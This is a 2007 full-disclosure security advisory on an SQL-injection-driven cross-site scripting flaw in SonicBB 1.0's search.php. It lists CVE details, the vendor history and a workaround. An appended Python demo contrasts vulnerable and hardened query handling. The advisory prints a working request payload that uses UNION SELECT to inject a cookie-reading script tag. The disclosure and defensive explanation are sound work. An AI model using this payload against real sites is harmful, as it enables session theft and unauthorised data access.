
List:       full-disclosure
Subject:    [Full-disclosure] SonicBB version 1.0 XSS Attack Vulnerabilities
From:       "SecurityResearch" <securityresearch () netvigilance ! com>
Date:       2007-05-14 12:32:27
Message-ID: 012FDE7DE21D97498794A72AEEF90D7F06A521 () beaverton ! portland ! local

netVigilance Security Advisory #20
SonicBB version 1.0 XSS Attack Vulnerabilities
Description:
SonicBB is a user-friendly and fully customizable bulletin board package. SonicBB is compatible with any web server/operating system combination with PHP 4.x or higher installed. SonicBB is the ideal community software for all sites. This vulnerability can be exploited only when PHP's magic_quotes_gpc setting is Off.
External References:
Mitre CVE:  CVE-2007-1903
NVD NIST: CVE-2007-1903
OSVDB: 34042
Summary:
SonicBB is a user-friendly and fully customizable bulletin board package. SonicBB is compatible with any web server/operating system combination with PHP 4.x or higher installed. SonicBB is the ideal community software for all sites. A security problem in the product allows attackers to carry out XSS attacks against its users.
Advisory URL:
http://www.netvigilance.com/advisory0020
Release Date:
05/14/2007 
Severity:
Risk: Medium
 
CVSS Metrics (CVSS version 1; the Impact Bias field and the 5.6 base score follow the v1 formula, not v2)
Access Vector: Remote
Access Complexity: High
Authentication: Not-required
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
Impact Bias: Normal
CVSS Base Score: 5.6
 
Target Distribution on Internet: Low
 
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Confirmed
 
Vulnerability Impact: Attack
Host Impact: XSS Attack.
SecureScout Testcase ID:
TC 17944
Vulnerable Systems:
SonicBB version 1.0
Vulnerability Type:
XSS (Cross-Site Scripting): forcing a web site to display malicious content to the target by sending the site a specially crafted request. The vulnerable web site is not itself the target of the attack; it is used as a tool by the attacker against the victim. In this case the script is delivered through SQL injection: the `part` parameter of search.php is placed in the database query unescaped, so a crafted value can close the backtick-quoted identifier, append a UNION SELECT whose result row contains a script tag, and comment out the rest of the original query; search.php then renders that row without output encoding. Because the payload relies on single-quoted string literals, it only works when magic_quotes_gpc is Off.
Vendor:
iScripts
Vendor Status:
Contact with the vendor was established and a draft of the security advisory was provided on 10 April 2007; the vendor promised to fix the issue but stopped responding to our emails on 10 April 2007. There is no official fix at the release of this Security Advisory.
Workaround:
In php.ini set magic_quotes_gpc = On (the request below only works while it is Off). Treat this as a mitigation, not a fix: magic_quotes_gpc merely backslash-escapes single quotes, double quotes, backslashes and NUL bytes in request data, it was deprecated in PHP 5.3 and removed in PHP 5.4, and it does nothing about the underlying unescaped query in search.php or the unencoded output. The proper fix is to restrict the `part` column name to a fixed allow-list, bind the search text as a query parameter, and HTML-encode values when they are written into the page.
Example:
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/search.php?query=1&part=post`<> '' UNION SELECT `id`,'<script>alert(document.cookie)</script>',1,1,1,1,`username` FROM `users` WHERE id=1%23
(%23 is a URL-encoded `#`, the MySQL comment character, which discards the remainder of the original query.)
REPLY:
Will execute <script>alert(document.cookie)</script>
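As an added example that is not part of this advisory or of SonicBB's code, the following Python script reconstructs the query shape that the request above implies, runs the advisory's `part` payload against it in an in-memory SQLite database, shows what magic_quotes_gpc = On does and does not stop, and contrasts a hardened search. Everything beyond what the request shows is assumed: the `posts` table, its column names and the searchable-column allow-list are invented; the payload's `#` comment is replaced with `--` because SQLite has no `#` comments; the `users` table is reduced to the `id` and `username` columns the payload reads.

```python
import html
import sqlite3

# Columns a user may search; an assumption, SonicBB's real list is not on the page.
ALLOWED_PARTS = {"title", "post", "author"}

# The advisory's `part` value, with MySQL's `#` comment swapped for SQLite's `--`.
PAYLOAD_PART = (
    "post`<> '' UNION SELECT `id`,"
    "'<script>alert(document.cookie)</script>',1,1,1,1,`username` "
    "FROM `users` WHERE id=1-- "
)


def open_db():
    """Constructed sample data: a posts table with seven columns (the count the
    payload's UNION implies) and the users table the payload reads."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE posts(id INTEGER, title TEXT, post TEXT,
                           col4 INTEGER, col5 INTEGER, col6 INTEGER, author TEXT);
        INSERT INTO posts VALUES(1, 'Welcome', 'Hello, board!', 0, 0, 0, 'alice');
        INSERT INTO posts VALUES(2, '<b>hi</b>', '<script>x</script>', 0, 0, 0, 'bob');
        CREATE TABLE users(id INTEGER, username TEXT);
        INSERT INTO users VALUES(1, 'admin');
    """)
    return conn


def search_vulnerable(conn, query, part):
    """Assumed shape of the original query: `part` is dropped inside identifier
    backticks and `query` inside a LIKE string, both unescaped."""
    sql = (f"SELECT `id`,`title`,`post`,`col4`,`col5`,`col6`,`author` "
           f"FROM `posts` WHERE `{part}` LIKE '%{query}%'")
    return conn.execute(sql).fetchall()


def render_vulnerable(rows):
    """Echoes result columns into HTML without encoding, so the row the injected
    UNION produced is rendered as markup."""
    return "".join(f"<h3>{row[1]}</h3><p>{row[2]}</p>" for row in rows)


def magic_quotes_gpc(value):
    """Emulates PHP's magic_quotes_gpc=On (addslashes): backslash-escapes single
    quote, double quote, backslash and NUL. Backticks and keywords pass through."""
    return (value.replace("\\", "\\\\").replace("'", "\\'")
                 .replace('"', '\\"').replace("\0", "\\0"))


def search_hardened(conn, query, part):
    """Column name checked against a fixed allow-list; the search text is bound
    as a parameter so it can never become SQL."""
    if part not in ALLOWED_PARTS:
        raise ValueError(f"unknown search column: {part!r}")
    sql = (f"SELECT `id`,`title`,`post`,`col4`,`col5`,`col6`,`author` "
           f"FROM `posts` WHERE `{part}` LIKE ?")
    return conn.execute(sql, (f"%{query}%",)).fetchall()


def render_hardened(rows):
    """HTML-encodes every value on output, so stored markup is shown as text."""
    return "".join(
        f"<h3>{html.escape(str(row[1]))}</h3><p>{html.escape(str(row[2]))}</p>"
        for row in rows)


def demo():
    conn = open_db()
    # 1. magic_quotes_gpc=Off: the UNION row comes back and is rendered as a script tag.
    injected = render_vulnerable(search_vulnerable(conn, "1", PAYLOAD_PART))
    # 2. magic_quotes_gpc=On: the escaped quotes make this statement unparsable,
    #    so this particular payload fails, but the backtick break-out and the
    #    UNION reached the database untouched.
    try:
        search_vulnerable(conn, "1", magic_quotes_gpc(PAYLOAD_PART))
        quotes_blocked = False
    except sqlite3.OperationalError:
        quotes_blocked = True
    # 3. Hardened path rejects the payload outright and encodes stored markup.
    try:
        search_hardened(conn, "1", PAYLOAD_PART)
        allowlist_blocked = False
    except ValueError:
        allowlist_blocked = True
    safe = render_hardened(search_hardened(conn, "script", "post"))
    return injected, quotes_blocked, allowlist_blocked, safe


if __name__ == "__main__":
    labels = ("injected", "quotes_blocked", "allowlist_blocked", "safe")
    for label, value in zip(labels, demo()):
        print(f"{label}: {value}")
```

Running it shows the unescaped page fragment containing the script tag, the magic-quotes variant failing only because the mangled quotes no longer parse, and the hardened search rejecting the payload before it reaches the database while encoding the stored `<script>x</script>` post as text.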
Credits: 
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.c

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


